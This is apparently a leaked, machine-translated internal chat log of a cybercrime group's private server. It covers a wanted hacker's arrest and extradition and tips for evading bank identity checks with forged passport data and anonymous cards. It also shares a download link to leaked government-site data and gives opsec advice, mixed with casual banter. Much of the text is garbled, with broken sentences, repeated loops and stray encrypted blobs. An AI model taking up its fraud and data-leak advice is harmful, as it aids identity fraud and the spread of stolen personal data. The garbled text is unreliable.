`{"$binary":"QXYwryQ4qJxWLGnrLZVZNfu976xOf/iEtG3Er78fmBVICptEKT4hutCKncLXoH8z5ll/Ue2AloeMjkRA/UcW9iRfNqKmQqip6XNLeqNKAgBDZWiXJpjUbG8bwi69wiqzF8M7Sc/SWFn3XI/PqPYry9AAce5Ig/NXi4VehICMUmkg+drSaVK3I1rGEBktT7f0X6MopQPDgj0NnC7qWI3sIAHitCpI00D2u58vEP/BzIimlnKg8Nl2zt41XoU/fDtb7roJ28WEKtb8mxG4weiud2PjcA/3I7ag9IZxJTXX5NyKMHxOmq7c+G+jWlr6wb0Orz4Qq4JNgsUvahOCNOzk194LvXECJ0hYdA3yjmx7SY6ZOGOsw2BTIg=="}`допустим at geralA here, by the way, what's the deal with encryption in individual chats?I forgot to tell) when you turn on e2e - goes in clear text *It seems that with direct message correspondence goes in clear text@all Gentlemen, look up your thread when you use *direct messages* in the rocket, just found out that the correspondence goes in OPEN TEXT, and only otr encrypts it! Reply from 77.88.55.70: Byte number=32 time=10ms TTL=53
Response from 77.88.55.70: number of bytes=32 time=11ms TTL=53
Response from 77.88.55.70: number of bytes=32 time=11ms TTL=53
reply from 77.88.55.70: number of bytes=32 time=11ms TTL=53thxquickly let's look into it@benny still the same, 502 that pulls that when trying to just go in through the browser@homer, cooing git? there script, should let go..gitlab is sick? 502 shows[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=j4ou2LTT7SsmnjPfn) better сталeyJhbGciOiJBNv/JG1tbUjuHY+dSaCzP9oTf0H0WzsH4dJ3hIH8ntKY08S2X78cvRkABz1xWC2cnyZzyn8GvSUPmsFulJXmjJkC7ydMOj4CpYjSjovxOM6f9I+hEUgYFlwT0J1XtGm2rS0DE3jl8+MGTYi+bjoYhkZ6Tk8OjVLnrzAQ8x0o/guaTUkYiuDt1cNHY8RYNm6PoeyJhbGciOiJB71kxzmZ5Y958BVyRF33zJY+GbDzEvZ7OdxXzvBGLegaERb80L4a1riF547p4zBRfV2fW89CQtiIVS4rVQoPBMB0AKnli2xNj0/bOmToW7Y5KhPw43e+/X1PCgWF2SqhAnEKXwvoZw2OQlmOiosWGqVjxUYgVOXKZHRm0QvkhQ5YXTV5WlbHz7modHN2BilgI1DRRV3m4kIFX8jC/G2Ch7O5FzdAd/I/uqH+rS32rc9+2+uxoELbOY/yshmwx9UZWDo6dgHQUzJ0KC/NPe0a3efCNQLfP+L7uwsiuEpmwuFfD0nOmY19YJSrqtY0Ri2ykylA20Gtq3pCv/AfDCCYHQ4R73061GrfsDtZP16VWNbZU5D8u8Qc/zqiEP4shppB8M8PShV6R04uob71hArfuMsUR3QgTIHDo1pxnwP4CZuByksdLHbrg2PS3HFmaHTLv+j3/JtRWutv/YNhS4IJ2X42MnC/1dTT0RE5w1pBddrkwRMG2jiUDUzXrxX56BMkLsMsX43+iOHFhpWLg86ZEFdUpA/Ei6PaRzBAovu3+Z4cu+aE+4lb2peq2uiiOVRrY1Xkd9hFJL4N/iLTPHRP4CIh6WRIDVfgtt74nqjNttHuBrsE9ZlxZGtZ3p+LYuzxZgoiTISP3oEJ60G7xUN2x+5xOlidgruze+TMDJTsnFVAv9Hd9iXrlp3XcHcQsmm5sN1kn71ogsPLK0xUSZT8DG30bzVW+T++2ECJhqrMGK+HkwsHHioRdONOIQaFPJpoVH4EidN8/ntYrlvNfzGhGHD96rzC55fEN write it down, I'll keep on shamming you pioneer rules FireFox assembly files *`moz.build`* ??? so I can torment questions @allen and @black :relaxed: wonderfully :face_with_hand_over_mouth:for him already answered)there is also something about Sevastopol ...)so talk ...(c) I also speak fluent English.yet irrelevant, thank you??? what are you wishing me? I do not understand a fucking thing) with an accent?) @silver I speak fluent English, Pavlovic comes out of the old guard k_plenet, there is an interesting fate of Skript, instead of term, book and yu_channel, in politics and a member of the Odessa City Council ......and I realized that he can not attach the file I thought he was talking about something systemic) and sits donates to collect for a lawyer))) Thomas, what else su&)) he was talking about the rocket, aha, or a process to run ssuprocess, buy the book "subscribe to the channel, say likes"?) yes bullshit, to subscribe to him) I'm tired of listening to Mario go rob the bank thank`` ``.
According to Pavlovic, the night before, when he checked into the hotel, he somehow "rang up" in the database. The police came to pick him up, but before taking him to the station, the officers allowed him to finish his meal: "all by aesthetics."

At the station he spent some time in a cell with people who were not very nice to him, and they took his belt, watch, and shoelaces off him. According to the hacker, after a few questions from the prosecutor he was released. "Alive, healthy, at liberty, enjoying a little bit of cool St. Petersburg air," he wrote.

Pavlovic also noted that he is wanted since 2007, and now he is solving this issue with the Americans through a lawyer.
What does Pavlovic himself say? Can someone say in two words...Technically everything is correct, but in fact it is mockery if they take someone like Pavlovic, who has been imprisoned twice, and then release him and he leads video clips, the Americans will not see this, but we will see Transom no longer, there are no more attacks on america and will not be in the foreseeable future from free miners, which means that we will be pinched and instantly the entire cyber underground goes underground. if they catch someone unknown to date on charges from Interpol in a high-profile international case, it is one thing-they love a multi-track operation.. they need to show the americans something, and to understand how we would react to it? that's how interesting the authorities had to get up to speedPatrick, I do not think that's "the plan", we'll deal with it... try it through sudo, what? write us the outcome of what he saysNow he's released, he's seen the stream, saysScheiße(it worksjabber status? try it through sudo if it passes then check the rightsAha) marked money in a bank account )) And the coupons marked in the wallet. How??? but who works in the rouge, they come to him in the morning, like a cool scheme@all who has free English? `https://habr.com/ru/post/586612/` these nlp-callers can not think of anything) I can not add a file to the private channel, writes
 EACCES: permission denied, open '/tmp/ufs/tobmRoDSwFNGRko4J'
is this how it works? https://www.justice.gov/opa/press-release/file/1445241/download
Page 27 :grin:Who wrote this? Dontsova, winking sinisterly and rubbing her hands together, "He's capable of anything. That's the kind of man we need," the members of the hack group wrote.
ahahahPavlovic is ours in the broad sense that he is our son of a bitch shhhhhHave you got someone from ours?)look at Jakubts) he's a wontead with a price of a million per head, looks like a fuck off to the pile `https://xakep.ru/2021/11/01/trickbot-member-extradited/` Not an understandable situation in general. Look, here's the hacker, we'd give him away, but we can't. But we'd really like to, as we promised at the meeting.
Pavlovich would not spend long in police custody, about a couple of days, during which the security forces would conduct a pre-extradition check. Then he would likely be released, since Russia has no extradition treaty with the United States.
```
We'll see how it ends and they also banned `codeby.net`, they position themselves as re-servers... Ours were negotiating with the americans, yesterday there was information that we handed over information about some hacker. It seems that this is the result of negotiations. `https://www.interfax.ru/russia/800909 `link to the news link Pavlovich was taken in Petersburg Interpol 0_0 I have a third day of problems with the browserTore loading error...guys, and pops up at anyone error in the Tore - PR_END_OF_FILE_ERROR ?oh man :(@jaime just yesterday with you talking about covid, today my neighbor's mother...package duplicated :)pongponggotten 30 minstat, tin that requires a passport when the card is already issued, I have a different patronymic (in their database) from the passport, the card only name / f-yada okay, the planet...
in a black hole let's settle)just dibs not man's stateyou need a planetDa will be so! I also suggested my own power plant, but they told me straight out that the accounting department would not approve it :grin:I re-read it: we came to the conclusion that we need our own bank. Guys, how to live without you))))`https://memepedia.ru/s-blekdzhekom-i-shlyuxami/`jokingly ok0) that the bankers face the first thought?))) Just like in the movie "Scarface" All! We need our own bank :partying_face:[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=eEb4HDSABrojynRGq) at best, can come with a desk check at the address?as for tink - I already wrote that they "ahead of the locomotive" write off what you can do? so even from the account of a sole proprietorship transfer all the same, as I understand, be a beaver, provide the contract will be from the account of a private entrepreneur / legal person to make transfers for example, and there is a commission all control reporting, etc. for what merits will they raise the commission if their transfers will fall off in the first place?? According to the principle "if oil is cheaper, benz increases in price"?but that was before it was possible to order a card to the post office before the demand - they do everything you can - SPB, direct fast payments from individuals' cards this control, if it will affect exchangers first of all - they will raise the commission I used to make an advkash with a painted passporttin kof when receiving the passport asked advakash as well as with tinkov a bank representative came in a car and recorded the passport data, so I do not see the difference therepashport) and how does the verification happen?do they make a named one is it named? tinkoff black also has nothing written on the tinkoff black card, but it is received by passport I did not even have time to use it when it was blocked because advcash stopped cooperating with that bank edkashvoda as advcash project is scandalized by taxation....i used advcash not so long ago, i bought it -- the name is not even written on the card, but it was issued by some raskobank, a "resident of skolkovo" sevav rb, it's very wary to use them now, the only way to solve the problem is to buy a nonnamed card from the bank, like advсhripta->local exchanger.mda(160-something countries signed the document on the exchange of information and their banks, by the way, since about 14 years they inform our banks about the accounts of non-residents-I remember this old-fashioned way ..... I remember this old-fashioned way ... You cannot go there, and who do you open it for - the old-fashioned way to get a card in the EU ... so what to do? They should buy the card from the old ones and then what shall they do? No, it seems to be hot news. If it is true, the withdrawal to the left Sber cards will be over But if he is serious, he says there will be no such thing))) The Central Bank is a man of his word and he takes his word back.I don't know how to get the money. it was like that. has anyone heard about the new law since January in the russian federation introduces control over the movement of funds between the accounts of individuals? and when you export 16 I got into 30 with the winDo you have a linker hanging up, even with the beta> who had VS 2022 installed / used?
We did, we used it. Collected files somehow do not work> I have space under the VM 50 GB, dz will not put like that
Download offline... At 50 will stand up, depending on what you're going to put)at me is, all normal, I do not dare, because I remember the first experience with win 10, the first reboot after installation and into the loop :))))))I know a friend put 11 as soon as it came out, mate sat there I have on a virtual machine who has win11, I have space for VMs 50 GB, I do not know put like that?) and how she behaves on vin10 by the way dakto VS 2022 put / used? Franz they are kidding so badly behaved current 2 weeks what does it mean for what month Santa Claus does not send gifts?(we need his grinch from Santa "presents" will not be?) and then Franz extinguished) and this wages for what month? do not DDosov) not all at once))) Populars, who sends wages in person kosh> We - the horror, flying on the wings of night!!!
We are the horror, flying on the wings of night!!! But our days are all long, because night is our day in commerce maximum short daynet31- work Well, if it's seriously a day off or not? It's not a day off everywhere, so I asked it's okay. Get ready for New Year's Eve with a glass of whiskey. Wednesday, Saturday, today we work all days beginning with C. The enemies don't sleep and of course the first.
A 31go we have a day of work or not? Cat cracked a joke (well, February 30 day does not exist as it would be)) Hz). I personally did not understand where the joke and where the truth), and January is that, will spend in anabiosis?) No, well, everything happens. (It's just an academic joke...)). I was asking about December 30) Uh-huh, until February 30. Hi. And we still have to pay on the 30th? I did not hear about this kind of fraud in the RB) "Here it is, the digital struggle) "Now they hack into government enterprises, encrypt them and download them. In return, they demand to release politically exposed persons who are not too lazy to dig the code, look for holes and try to do something)). In reality, maybe the rest of the functionality still works It's true, they have a good go at the DB, at least it says so on the main page The site is down, Penza is closed, I think they have jammed it and will not open until they fix all the holes in it. video, wiretaps, etc..Is it realistic or passport data can be replaced with TIN, like Vasya Pupkin for Petya Taburetkin? How realistic to replace the information in the database pidarasym I sms came several times to the phone with the authorization code judging by the fact that when they started a madhouse with the voting, they started to hack everyone But I did not watch so far as I understand the state services passwords in the database are generally stored in the public domain Well, what passwords such and security as education - so and Education Minister :):grinning:password 11 login was admin there was access for the Minister of Education of our region and so onCome on, we have enough sloppiness, but do not forget how they sold a laptop from the U.S. Department of Defense on Amazon with classified information of students, students, a bunch of passport data There was (or still is) a portal that was shared access) without passwords when I worked in education was one interesting thing.all these state resources must be a madhouse with security. probably no one will even say anythingPutin will probably "punish" everyone for this) when you dig around, tell me what you hope to find interesting I downloaded it overnight) ok, it will take 9 hours to download it) `https://anonfiles.com/vbX2e5Wew9/gosuslugi.pnzreg.ru_rar`test` txt Forgot how to wrap the link?)There was a link on the hbr, through it you can get to the fileYes, the entire folder is a legal porn...@homer and what link downloaded? And if pdf and the like, what's there for 7GB ? three pasmorty and a roller porn? there pdf doc, etc.Most weighs the folder .git and folder with the download documents as pure engine, the database has not found______█████████
______"▄"""""▄
______"▼▼▼▼▼
_____""▌_______"
______"▲▲▲▲▲
______""""""""
______ """_____"""bitrix )))) saw something familiar, I haven't really looked at it yet...)) And who has looked at what is leaked there? There are only sorts, there is no base, right?eyJhbGciOiJBLfER3XAcRPs3I0lyhW9zfqMXFGmQ9ku60Lm8wemVz8kbykdvfncnBUbL2D1goVK1uUba9NYavYl866Skk4aK/cx9gEEE+Ck2rb7C3sljD9Q/NpvanNLHk1DMuZj5SILU0qM+kAmXtzKXsciPags9Mw6UWfkjHkrOyafexE0fETmSTs9RYkenIp7raqG/EiL3eyJhbGciOiJBLOhPXRMUzjrvqKUdfBjiXb39BpW5ntpRH/pp+GhbLGKms00Dsnqwm4xxoVWb+H2H7Q+JGZUy/VINFnZUV6847hdCMsl1rZ4eYNn9K5a553EfDgZTxqdshk7C1H1rq/srDdU4ZICVt+L1Vsi2u6scyUohpbkzd5EulT5LynXGZvbizQfefcNB0SayUjLdy5XL3t0QbQIp/Hc1C6kryRdJkDGeawTfRmOMNijEmPMMZAyQ3qwXq+i6/gLPIGJaoezhPznFYmN/xf7PJysG3sW+zrNYoncpvI2MPijbiyTy/68NOUr6ZG1wzgXrYvn/1R7hhVUm8jG2D1Ra4rkCx7Sf1Bm+eLxo7l/zmlIIQlAfDpsW8mvhmn1In43Nb6sP1+uOl+iH/dAWSJ85EL/iZrnmCPRaFamYIKV48UHfxC4iNUjqx8AONp98pE9Hx3XjqCEQRKL5w0MVmoxSJLqWnflekDnnntdwlcb+k9FQ2EZjmwJYndmQpsTpIbzS12gPoUyUHzczPALzUW0beSyI3XjVGcpROdGM0LYVhgJ4KDyrC9w5RDFXcafN9GEnbgbB0q44gcziIbF7rYi0BrJpYOeFrsjfnETMSM1rHwlSGac3m5RCWCspYEjd3E4jt6xUXjd/wCs4ypWDoRBizimIRJVLaSy6UG+vXxzKY1fKhX34Is4=eyJhbGciOiJBxohPPZyCTOA/1CfU+EvR/rUu0OiRYW5bB8TKaKIpVvy6+cJlrfJF7J79MTk1yfKTowWhGJTEf5/p4w1PlUldONqsWu/bQWWaTOyrU9G2PNkvHgAd ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=vXjkfAoggnTZKHQJH) Check out this one:
sandisk extreme portable ssd v2And I haven't gotten to usb 3.I like the way Intel 760p works, I wouldn't say it's too hot, but it's not scalding and it works without a radiator, it's enough to work with, i like the Intel 760p i can tell it runs like crazy, even though it is very warm, it doesn't burn, it works without a heatsink, it's enough to run. any flaws due to temperature i haven't observed any read/write speeds they have. the corsair ssd 980 pro is good in speed if the M2> M2 SSD NVMe and M2 SSD sata in the case which is connected via USB-C ?)
Is USB-C 3.0 or 3.1/3.2 ?
Sata has a theoretical speed of 6 gbits, max.
When nvme will be 10 gbps, but there is still very important! controller, ssd itself and of course the hardware pk.Totally need a specialist in hardware. bro, where are you?))) question is the difference in speed, between the M2 SSD NVMe and M2 SSD Sata in the case, which hooks via USB-C?) option with the case also considered, but went straight to the ready external. my thoughts are elsewhere) just think about buying an external SSD, that's what I think if it will cling to as USB-C what betterThunderbolt with this beast from the reviews only know. samsungs looked external, speed 40gbits of course the plane is still that. but for now I'm happy with my ssd, what you need from it performs and okIn early 2021 Intel representative said that a new Thunderbolt 5 interface is already in development, the expected speed should be 80Gb/s (10Gb/s), that's twice as fast as Thunderbolt 4 and USB4 interfaces[34].lucky you have it, i don't have it *Thunderbolt* who used it? how much faster than usb 3.2? the hard drive is the hard drive externalcotlichno, i will try it, so i did not notice, everything was fine *hard drive ssdish* - who is the it??? rhino + bulldog? i don't know about the speeds there in the difference tayp c is also there straight flies ? but true, USB Type-C i used both on my laptop and on the external ssd slags are there ?on the external ssd system put + virtuals on the same, works fine for 3.I would have thought i would have done it with a case and external one or better sell the new one and just buy external ssd harddrive. Is there a reason ssd nvme throw to external hard drive on usb 3.1 ?> Or on disks from china to order
yyyy) `who here writes in python?
I write from time to time. But the depth has not had измерять)eyJhbGciOiJBa5CmWzTHvtjCSYxRmluPaXFGJ02NyiLIzrzyCzYaslEQcfK30CVa/cR6+hnFS3V0MzujnYOdpU3H1z49GD4M4UcAyKsJRkBlXEs7wy8E3AtrtHeiZQsqgyUY4uqwW4QRQlDt+al+Pi1vm+EDg6IJvfX8fkmrWzlvZVD+Lf4/EjSI/VQxEt6dgjym4YHfVwS4eyJhbGciOiJByrdLAVO4N7fUnxEwQyfR8eab3NP787OLFbAMtb7/q0WBsTVFyN12ZHXLqRebr+2BBMMRn2X0Eg66+JCIbkGq2hTtODmPRc7xkhqteGFtUBtudPaFHWegj2Av4oDlQ2yezTTnwrHRnCmfVzLoaa4yoRAlMaOLSVtshl2FtlhanpypNzzanIdWyBD05/qNfVzqSw1NsIR7sQYG2kDXQ4jTEg==хайприветlawerenceвидать it's it's not me who has the problem, I read the "zapil" and then refill it, then reboot myself and that's better than the reset button, then keep running it through your head and the necessary stuff flies by and you remember a lot of shit that is not necessary before there were less surrogates, why the fuck would you want to fuck with the chip to increase memory? It was a Johnny Mnemonic to ride in a car without navigation and find each other once beforehand once agreed with a man to meet somewhere, a biohacker was alone, he sat on ahms for yearsxxz, before it was cunt without devices maybe there also zeros and unities in the encrypted view need a unified theory of everything, lol I want to see the world as described in the Ij dmitry rusad no secrets there fucking we know how to dig into the body1. Biohackers do all sorts of fucked up things with the body))
2. Where did neurons come from? - studied the workings of the brain.
angelo, everything is in process, you will see soon in the brain ad, bear with me)))and what is the main secret - the brain in what principle ap?i'm not talking about fucked up, i'm talking about the body, we've already fucked it up a lot more and it can also reject the "foreign" body, you can't fuck with the body, you can't do anything with the body as it would be cool to do. Being able to count memory, being able to send video signals to the brain's neurons directly without our current crutches. That's what green tea brings to mind at night, but I'm thinking about vodka. I wonder how long it will be before we can understand how memory works in the human brain and how it is deciphered/recorded and rewritten. We know so much about the human body, so much we can do with it. And most importantly, the brain is a mystery to us. That's a shame.you should have triggered@angelo I said the word "vodka" and 100 grams of vodka, now you would have had soup or borshchik above some gastro-sadism:zany_face::imp:i myself add access to the repository i don't know how to add or in tropico game zivvu should be addeda if two wrong moves two missiles will fly one wrong move with african whore's mouth with dick in some fucking uncle's mouth it depends to whom and depends whowhether continental ballistic missile you're thinking of leaving one head with a life connection, a 10 kopeck coin slot, and the inscription 10 kopecks - 1 hour minicab on the forehead?i'm thinking about sexual pleasures after the meal :rolling_eyes:and you're thinking about eating, what are you thinking about? kermit tell him ! fuck, but it's a functional part..... it's very important not to fuck him up first i like to apunt him for rational use of resources !but the functional part is !apunctate it hardwhy waste the goodness of the whole thing and in fact you can apunctate the legs+++yes, fuck it - i like cholodeca with mustard from your whoremongers, We'll throw whole pieces of rice in it, for the pilaf, we'll get some cumin or fat assholes?I need some more carrots while I cut the onions. Who's got a big cauldron?*who had the whores there? so sekshnado choose who to eat firstpipeda how urgent, how many balconies are hanging over his head, and the ice is everywhere, it's unlikelyDelete the patch) urgently remove from the release!Fuck, that's right Somewhere he did not have time and allYou wrote "Harnie his bot until tonight "angelo, you misspelled the scriptWe do not know if he is alive or not, so too early to say, I'm for his health did not reach prayers) @frances know I prayed for you!) He even works?) Has anyone tried it? Like there beta, designer for developmentPlus in opsianii written that it may not workThere's something unusual on the back side of the physical switch to turn off the camera, wifi, etc.
There is a doc, schematics...
This is all good, but here in the same docks, iron update: added pull switch, now wyfay not turn on by itself)))) 400 bucks a Gorila put 4uyuThere are not only kdeKastomny phone with linux and kde mobile like the Chinese.
Yes it seems all the same is not without blocks.Tolko do not drop the background take what the hell is this? They recently rolled out a fresh smart, glass screen and stuffInterestingly, has anyone tried a pine phone?
ah, maybe like this...fuck it, fractalsTo make beings live there too and create a new matrixTo not workWe all live in a matrixWhat's the point of looking for the point?) It doesn't exist anyway)And why think about it... about the meaning of life
ahahahaI either went to sleep or to workthinking about the meaning of lifeNorm talked to each othera Why are you so quiet on the device above his picture and dough to shower a voodoo dolla I put a candle for all of youI have a wife praying for Silver his health>>I have a wife
and this thing's for a change. I've got a wife and we're praying for Franz and his health.
https://www.fleshlight.com/products/universal-launch-landing?locale=en
```
vr maintained not, silence whileFranz did not show up? bot with you one on his head and the other two in his hands and two eggscore chenille in 19 picked up back in 2018enovo eksplorer that flew in vardredoi, now i remember what you have ?Halphua it's been gathering dust for a year, tell me something under BP helmet, yes, toystut about toys they were talking about. "Here, look, fuck," I went to Netflix and there's such a cartoon series@rags so in Russia there are 12 time zones. We don't know where he came from, I'm watching the TV series "Dota" We have heart-to-heart talks here@allen ruined everything))) The funny thing is that until tonight Franz is saved by all the gods of this world, Franz is coming! We have a discussion about the Police Academy Where is Franz from the ZP??? here he didn't like him dahaytowerMahoney what do i remember from the names =) come on, the main face countMac what's his name i don't remember him who tried to bake there was captain who is it? well then, in your case i can draw a parallel with captain harisomda we almost twinsagainst him with a crooked voice yes?You reminded me of a junkie from the police academy. Did you add petrol and drink it?:D And if it did not burn? We were brave guys, Kerah! We drank everything that burns, you probably drink glass soap too)) the smell and taste was pretty bad, but I drank 0.7 in one go. i've been looking for myself for 2 days after i drank cobra instead of what? - Well, in vietnam it's popular bragascorpion instead of pepper... cobra on scopion is like a fucking crap, worse than moonshine... i remember i drank cobra tincture with scorpion to avoid wrinkles on...Juvitamin Y?or eat fugu =) + vitaminkida, but there you also eat, you know, double profiteer to clean a smallworm for 2K bucks i don't see any difficulties here, you should eat a live tarantula for 2K bucks everything depends on the amount of x in the equations, how many are there? (you do the fucking thing and you get the money.
i think that's why we all came here, we even thought about it for free .... fuck, you do the shit and you get the dough, you need to go to the emtivi show and bet on it) fuck, not for 10K you're a black digger, i'll take it with me to the grave. it's cold sometimes, but you just hint if anything, and tell me where i can get 3090 after you, so don't knock it, they are fine, more power!you can tell that to your heart valves power is never shortenenenenYou're a gameandle raetresingamnne 3070 more than thatTell me what for? expensive =) anyone already preparing to buy 3090 Ti?) love our dialogues bro! i go to the sauna, and you in the girls' sauna maybe went to the sauna? you sure go to the bath?you go to a fucking bathhouse, you can't get up, but your soul rejoices. a bathhouse is a fucking pleasure, especially if it's with vennicompression, I'm going to youtube about 00x games, whatever you say, you definitely do not call for a bathhouse, only you put your twisted meaning in a simple sentence I was waiting for these words) i can't help but wonder what the point of the game is... i can't help but wonder what the point of the game is... i can't help but wonder what the point of the game is... i can't help but wonder what the point of the game is.., where you have to throw the shit into the gateobozhal cannon that cuts it was possible to create madness and so and so machinery on the mapTurnament was great in their dopaho daaakart cool ah I was hooked on this here ......mutatorsremodes dohuyahz, the most fanatical multiplayer was in unril turnamenta samaya fischka this game mode: base on the basek by the way very interesting gameplay was in multitiplayer, balanced enough everything was.i on renegade) ku3 do not remember what cards from ku3 remember? exactly rightpack on the head, tire crusher head and was still chips for the bloodiest murderaz criminal gamelamenhunt is where you had to stealthily kill in the shadows?
https://www.youtube.com/watch?v=sfwG1zgc0_Q
I remembered menhunt the other daymax payne 3 kayfovye game muikovscha we are young old men +)happy no longer interesting, had to stay young =)do not have time ...eh how to sit down want to play a little sometimes i somehow the other day i remember mahrunner i zochu max payne download that you had to get away from computa 36 mapav red aert on the local loop on ps1 playeda, i thought you said you played = (i have not played =) kennyomga remember :d@rags so wanted to know your nickname in renegade, although now I do not remember who was there from the nerds))) =) like vintavrode and m19 than the world 2008 on ren tv remember the vid with ankaidam like all killed anyone not real =) i last year old batla installed, could not play, also it was "appear killed, appear killed, left koroch =))"
i used to play the old Battlestar, i used to play the old Battlestar, i used to play the old Battlestar, i used to play the old Battlestar, i used to play the old Battlestar, i used to play the old Battlestar, and there's a lot of good old Battlestar, but i don't get it, i don't get it, i got it, it's like a crappy game. i used to run Q3k chairmates have roots, there's also the 2nd Quake server now, like two years ago, go out, appear and kill, appear and kill, come out =)) Ya, Ya, Ya, Especially the jumping was good, i liked the second one, it was more like the second one.better 2 =)I'll humiliate you there, do not give your servak ku3 will raise you all the terrible was waiting for Renegade 2 and I saw Heretic and tears came from my eyes there were times of nostalgia in Stim there):):(I TA did not play I was too young to remember such subtleties * the best aviation among all RTS on the Stim servers?i can't remember already i was too young to remember the subtleties of T.A.T.A.T.A.T.A.T.A.T.A.T.A.T.A. was the best among all the rts servers on the stor.i can't remember already i was too young to remember it was aviation.nukuk how to twist T.A.T.A. is much more interesting.did you play multiplayer? as well as red alertTotal anihilution 97 year 0_0stanks inc=) anrealfollow me!:) yes there were timesOkrashkveyk 2, kratme raiding our all Total Anihilaton who know?! childhood remembered affirmative!But I didn't get to Renegade in C&C I've rumbled in C&C Renegade who?) saw about red alert here) oh Kera you're an intrigue in these matters hahaha the tingle It makes you even harder to harden, wank you think a redheaded scary guy who likes to fuck ugly Asian women. I think it's scary! And the redhead knows what you're doing there )) now you can not bind FBhuyevo that facebook owns oculus, you can always sell it on the secondary market if it did not come upafter all who thought to take glasses recommended oculus quest 2 - the price 250-300 bucks, I myself am waiting )) and gloves with tactile feedback ) oh yes rendezvous!!!physics is indistinguishable reissue rendezvous with a stranger VRda there banal from tenis azuevayeshkrutyakdazhe did not put but triedhalf life aluh passed, @angelo?yeah come on your ploikine, buy quests 2 soon ps release vr2da here i think either to buy vr for the ps or just eat vroni worth it do not steamTomas buy for 25Kotia vomit that's better to play on an empty stomach playprivykazhivayut?i didn't buy it that way (but you get used to it, it's like puking in a boy's mouth, i get nauseous) how do you like it?i played paintball in VR and basketball - honestly, cool theme and chicks, especially the sound theme the second theme the first is so bad put red alert the first, hurt him i got old cheekbones and i jerk off to VR games as well as the second gothicada it's not stable it doesn't matter if i made it or not, i don't care how many times i passed arcanum maybe life will play more colors Find arcanumno there starforce, lol found some old game discs there can also balduys gate ?better larry) recently went to my parents i'm thinking of a second gothic, lolnu here, like farts you and me keraa i put jagged alliance 2 on vm, lolstar for all time !dum and dum's storyline i deleted it when the missions where you have to jump like a motherfucker i personally would love it if they resurrected arcanum i started playing starcraft 2 again) master of magic) you know what i downloaded game world starters some kind of fucked up jumping around and bouncing around, again remember the twins)) he's more on the fan experience is a platformer or something doom is also a classic xdtwo times came out beautifully doom by the way, they were able to stretch out with lootboxes and premium magazines at least the developers don't make wankers on the fucking watch better than half-life 3 indie is a wanker and throw it away the future for the indie segment it's a fuckin' new ipremakes and remixes they've been fuckin' up the old one for years it's a credit to the old daysda they don't fuckin' do shit old school wankers they rarely but make masterpiecesda ok because they ran out of fingers with nothing to fuckin' suck it out of, bliz has been feeding shit to fans for a long timeWerwatch has also been a themeStarcraft 2 has always been a themeActivated starcraft 2 has always been a themeAnd they will make a normal product - on - give plus their ms will wash away the cunt of the blizardoumoz a long time ago cunt the colda will come alive Develop game pass+687 billion the price of the deal michrosoft? with the merger they bought them30%+ was there something super mega released? why is everyone saying that they should have bought blizard stock yesterday? this never happened before do you think the system does not fail? @angelo i told you. the rate is too low. forget the coins)) no, obama only pisses in my driveway yesterday and puked like a sick dog> it's Biden's fault
Worse. Obama would be better if the pennies were falling off or something else will fall off. It's good that it's only the letters. It's Biden's fault. The letters have been falling off lately, just in the dust.
fatal error: linux/types.h: No such file or directory
    5 | #include <linux/types.h>
      | ^~~~~~~~~~~~~~~
``like in bk:smiling_imp:they're fucking around, they could have done soapMaybe they stole something there too...racist just letHmVaughn it's like I assumed the menu was stolen by gypsiesIt wasn't like that either I can't turn it on. The menu's gone somewhere. Is it like that for everyone? Or is it just me? it's falling off over time is it workingOtR disabled? )))) i got it all) by the way i use as benny said - i let the vmka traffic through hunix. Different tasks - different waysEnge, you do not understand, it is the fight against leaks)Yes[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=B9JsomRgLXfy5F7WJ) Can you tell me more? You can also at `leisure.cz ` fight one right)Yes, you can fight at your leisure) You can also use openwrt image, as an option.If you want to use openwrt image for your own system you can use "whonix router" image and let all your vm traffic through it... You need to fight with leaks effectively and get results...It makes sense to use your own router for your own working system. Deploy it on vm for example... As far as I know we only connect to virtual machines via vpn etc... Another question, why do you have to fight traffic leakage on vin?) It's like using sieve to draw water...That's why make applications to fix traffic leakage that allow it) he has linux)Do you also have routers? Let me see, adapt it for the windo.there everything is closed on ufwmen, I have only for the linj(, like on/offSomeone here is a script, I think skidyval for windo.then just in tor routers set and all if virtualulkiwrap to InetIn me the bot climbs into the internet when you boot up.Yes, you need to boot no connection except vrpakilswitch, is this bashik to cut off everything except vpn? Folks, anyone using killswitch & openvpn gui?:rofl:@frances may God bless you bot until tonight !:vulcan:Hello all! Do not lose me, I will be closer to tonight, waiting for the WP..Best wishes to all !{ 